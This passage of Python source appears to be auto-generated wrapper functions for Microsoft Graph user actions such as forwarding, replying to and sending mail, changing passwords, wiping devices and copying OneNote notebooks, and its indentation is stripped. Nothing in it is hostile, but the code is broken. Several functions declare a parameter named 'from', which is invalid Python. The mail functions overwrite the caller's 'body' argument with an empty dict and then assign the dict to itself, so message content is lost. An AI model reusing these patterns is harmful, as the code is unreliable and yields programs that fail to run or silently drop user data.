return client.create_reply_all(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_forward(client,
user_id,
message_id,
body,
to_recipients=None,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
microsoft_graph_message_to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if to_recipients is not None:
body['to_recipients'] = to_recipients
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if microsoft_graph_message_to_recipients is not None:
body['message']['to_recipients'] = microsoft_graph_message_to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.forward(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_move(client,
user_id,
message_id,
destination_id=None):
body = {}
if destination_id is not None:
body['destination_id'] = destination_id
return client.move(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_reply(client,
user_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.reply(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_reply_all(client,
user_id,
message_id,
body,
comment=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if comment is not None:
body['comment'] = comment
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.reply_all(user_id=user_id,
message_id=message_id,
body=body)
def usersactions_usersmessage_send(client,
user_id,
message_id):
return client.send(user_id=user_id,
message_id=message_id)
def usersactions_user_assign_license(client,
user_id,
add_licenses=None,
remove_licenses=None):
body = {}
if add_licenses is not None:
body['add_licenses'] = add_licenses
if remove_licenses is not None:
body['remove_licenses'] = remove_licenses
return client.assign_license(user_id=user_id,
body=body)
def usersactions_user_change_password(client,
user_id,
current_password=None,
new_password=None):
body = {}
if current_password is not None:
body['current_password'] = current_password
if new_password is not None:
body['new_password'] = new_password
return client.change_password(user_id=user_id,
body=body)
def usersactions_user_check_member_group(client,
user_id,
group_ids=None):
body = {}
if group_ids is not None:
body['group_ids'] = group_ids
return client.check_member_groups(user_id=user_id,
body=body)
def usersactions_user_check_member_object(client,
user_id,
ids=None):
body = {}
if ids is not None:
body['ids'] = ids
return client.check_member_objects(user_id=user_id,
body=body)
def usersactions_user_export_personal_data(client,
user_id,
storage_location=None):
body = {}
if storage_location is not None:
body['storage_location'] = storage_location
return client.export_personal_data(user_id=user_id,
body=body)
def usersactions_user_find_meeting_time(client,
user_id,
body):
return client.find_meeting_times(user_id=user_id,
body=body)
def usersactions_user_get_available_extension_property(client,
is_synced_from_on_premises=None):
body = {}
if is_synced_from_on_premises is not None:
body['is_synced_from_on_premises'] = is_synced_from_on_premises
else:
body['is_synced_from_on_premises'] = False
return client.get_available_extension_properties(body=body)
def usersactions_user_get_by_id(client,
ids=None,
types=None):
body = {}
if ids is not None:
body['ids'] = ids
if types is not None:
body['types'] = types
return client.get_by_ids(body=body)
def usersactions_user_get_mail_tip(client,
user_id,
email_addresses=None,
mail_tips_options=None):
body = {}
if email_addresses is not None:
body['email_addresses'] = email_addresses
if mail_tips_options is not None:
body['mail_tips_options'] = mail_tips_options
return client.get_mail_tips(user_id=user_id,
body=body)
def usersactions_user_get_member_group(client,
user_id,
security_enabled_only=None):
body = {}
if security_enabled_only is not None:
body['security_enabled_only'] = security_enabled_only
else:
body['security_enabled_only'] = False
return client.get_member_groups(user_id=user_id,
body=body)
def usersactions_user_get_member_object(client,
user_id,
security_enabled_only=None):
body = {}
if security_enabled_only is not None:
body['security_enabled_only'] = security_enabled_only
else:
body['security_enabled_only'] = False
return client.get_member_objects(user_id=user_id,
body=body)
def usersactions_user_remove_all_device_from_management(client,
user_id):
return client.remove_all_devices_from_management(user_id=user_id)
def usersactions_user_reprocess_license_assignment(client,
user_id):
return client.reprocess_license_assignment(user_id=user_id)
def usersactions_user_restore(client,
user_id):
return client.restore(user_id=user_id)
def usersactions_user_revoke_sign_in_session(client,
user_id):
return client.revoke_sign_in_sessions(user_id=user_id)
def usersactions_user_send_mail(client,
user_id,
body,
save_to_sent_items=None,
id_=None,
categories=None,
change_key=None,
created_date_time=None,
last_modified_date_time=None,
bcc_recipients=None,
body_preview=None,
cc_recipients=None,
conversation_id=None,
conversation_index=None,
flag=None,
from=None,
has_attachments=None,
importance=None,
inference_classification=None,
internet_message_headers=None,
internet_message_id=None,
is_delivery_receipt_requested=None,
is_draft=None,
is_read=None,
is_read_receipt_requested=None,
parent_folder_id=None,
received_date_time=None,
reply_to=None,
sender=None,
sent_date_time=None,
subject=None,
to_recipients=None,
unique_body=None,
web_link=None,
attachments=None,
extensions=None,
multi_value_extended_properties=None,
single_value_extended_properties=None):
body = {}
if save_to_sent_items is not None:
body['save_to_sent_items'] = save_to_sent_items
else:
body['save_to_sent_items'] = False
body['message'] = {}
if id_ is not None:
body['message']['id'] = id_
if categories is not None:
body['message']['categories'] = categories
if change_key is not None:
body['message']['change_key'] = change_key
if created_date_time is not None:
body['message']['created_date_time'] = created_date_time
if last_modified_date_time is not None:
body['message']['last_modified_date_time'] = last_modified_date_time
if bcc_recipients is not None:
body['message']['bcc_recipients'] = bcc_recipients
body['message']['body'] = body
if body_preview is not None:
body['message']['body_preview'] = body_preview
if cc_recipients is not None:
body['message']['cc_recipients'] = cc_recipients
if conversation_id is not None:
body['message']['conversation_id'] = conversation_id
if conversation_index is not None:
body['message']['conversation_index'] = conversation_index
if flag is not None:
body['message']['flag'] = flag
if from is not None:
body['message']['from_property'] = from
if has_attachments is not None:
body['message']['has_attachments'] = has_attachments
if importance is not None:
body['message']['importance'] = importance
if inference_classification is not None:
body['message']['inference_classification'] = inference_classification
if internet_message_headers is not None:
body['message']['internet_message_headers'] = internet_message_headers
if internet_message_id is not None:
body['message']['internet_message_id'] = internet_message_id
if is_delivery_receipt_requested is not None:
body['message']['is_delivery_receipt_requested'] = is_delivery_receipt_requested
if is_draft is not None:
body['message']['is_draft'] = is_draft
if is_read is not None:
body['message']['is_read'] = is_read
if is_read_receipt_requested is not None:
body['message']['is_read_receipt_requested'] = is_read_receipt_requested
if parent_folder_id is not None:
body['message']['parent_folder_id'] = parent_folder_id
if received_date_time is not None:
body['message']['received_date_time'] = received_date_time
if reply_to is not None:
body['message']['reply_to'] = reply_to
if sender is not None:
body['message']['sender'] = sender
if sent_date_time is not None:
body['message']['sent_date_time'] = sent_date_time
if subject is not None:
body['message']['subject'] = subject
if to_recipients is not None:
body['message']['to_recipients'] = to_recipients
if unique_body is not None:
body['message']['unique_body'] = unique_body
if web_link is not None:
body['message']['web_link'] = web_link
if attachments is not None:
body['message']['attachments'] = attachments
if extensions is not None:
body['message']['extensions'] = extensions
if multi_value_extended_properties is not None:
body['message']['multi_value_extended_properties'] = multi_value_extended_properties
if single_value_extended_properties is not None:
body['message']['single_value_extended_properties'] = single_value_extended_properties
if len(body['message']) == 0:
del body['message']
return client.send_mail(user_id=user_id,
body=body)
def usersactions_user_translate_exchange_id(client,
user_id,
input_ids=None,
target_id_type=None,
source_id_type=None):
body = {}
if input_ids is not None:
body['input_ids'] = input_ids
if target_id_type is not None:
body['target_id_type'] = target_id_type
if source_id_type is not None:
body['source_id_type'] = source_id_type
return client.translate_exchange_ids(user_id=user_id,
body=body)
def usersactions_user_validate_property(client,
entity_type=None,
display_name=None,
mail_nickname=None,
on_behalf_of_user_id=None):
body = {}
if entity_type is not None:
body['entity_type'] = entity_type
if display_name is not None:
body['display_name'] = display_name
if mail_nickname is not None:
body['mail_nickname'] = mail_nickname
if on_behalf_of_user_id is not None:
body['on_behalf_of_user_id'] = on_behalf_of_user_id
return client.validate_properties(body=body)
def usersactions_user_wipe_managed_app_registration_by_device_tag(client,
user_id,
device_tag=None):
body = {}
if device_tag is not None:
body['device_tag'] = device_tag
return client.wipe_managed_app_registrations_by_device_tag(user_id=user_id,
body=body)
def usersactions_usersonenotenotebook_copy_notebook(client,
user_id,
notebook_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
body=body)
def usersactions_usersonenotenotebook_get_notebook_from_web_url(client,
user_id,
web_url=None):
body = {}
if web_url is not None:
body['web_url'] = web_url
return client.get_notebook_from_web_url(user_id=user_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupsparentnotebook_copy_notebook(client,
user_id,
notebook_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssection_copy_to_notebook(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssection_copy_to_section_group(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspage_copy_to_section(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspage_onenote_patch_content(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentnotebook_copy_notebook(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentsection_copy_to_notebook(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentsection_copy_to_section_group(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectiongroupssectionsparentnotebook_copy_notebook(client,
user_id,
notebook_id,
section_group_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssection_copy_to_notebook(client,
user_id,
notebook_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssection_copy_to_section_group(client,
user_id,
notebook_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssectionspage_copy_to_section(client,
user_id,
notebook_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectionspage_onenote_patch_content(client,
user_id,
notebook_id,
onenote_section_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectionspagesparentnotebook_copy_notebook(client,
user_id,
notebook_id,
onenote_section_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectionspagesparentsection_copy_to_notebook(client,
user_id,
notebook_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectionspagesparentsection_copy_to_section_group(client,
user_id,
notebook_id,
onenote_section_id,
onenote_page_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotenotebookssectionsparentnotebook_copy_notebook(client,
user_id,
notebook_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupparentnotebook_copy_notebook(client,
user_id,
notebook_id,
onenote_section_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupsection_copy_to_notebook(client,
user_id,
notebook_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupsection_copy_to_section_group(client,
user_id,
notebook_id,
onenote_section_id,
onenote_section_id1,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section_group(user_id=user_id,
notebook_id=notebook_id,
onenote_section_id=onenote_section_id,
onenote_section_id1=onenote_section_id1,
body=body)
def usersactions_usersonenotepage_copy_to_section(client,
user_id,
onenote_page_id,
id_=None,
group_id=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_section(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepage_onenote_patch_content(client,
user_id,
onenote_page_id,
commands=None):
body = {}
if commands is not None:
body['commands'] = commands
return client.onenote_patch_content(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupsparentnotebook_copy_notebook(client,
user_id,
onenote_page_id,
section_group_id,
group_id=None,
rename_as=None,
notebook_folder=None,
site_collection_id=None,
site_id=None):
body = {}
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if notebook_folder is not None:
body['notebook_folder'] = notebook_folder
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
body=body)
def usersactions_usersonenotepagesparentnotebooksectiongroupssection_copy_to_notebook(client,
user_id,
onenote_page_id,
section_group_id,
onenote_section_id,
id_=None,
group_id=None,
rename_as=None,
site_collection_id=None,
site_id=None):
body = {}
if id_ is not None:
body['id'] = id_
if group_id is not None:
body['group_id'] = group_id
if rename_as is not None:
body['rename_as'] = rename_as
if site_collection_id is not None:
body['site_collection_id'] = site_collection_id
if site_id is not None:
body['site_id'] = site_id
return client.copy_to_notebook(user_id=user_id,
onenote_page_id=onenote_page_id,
section_group_id=section_group_id,
onenote_section_id=onenote_section_id,
body=body)
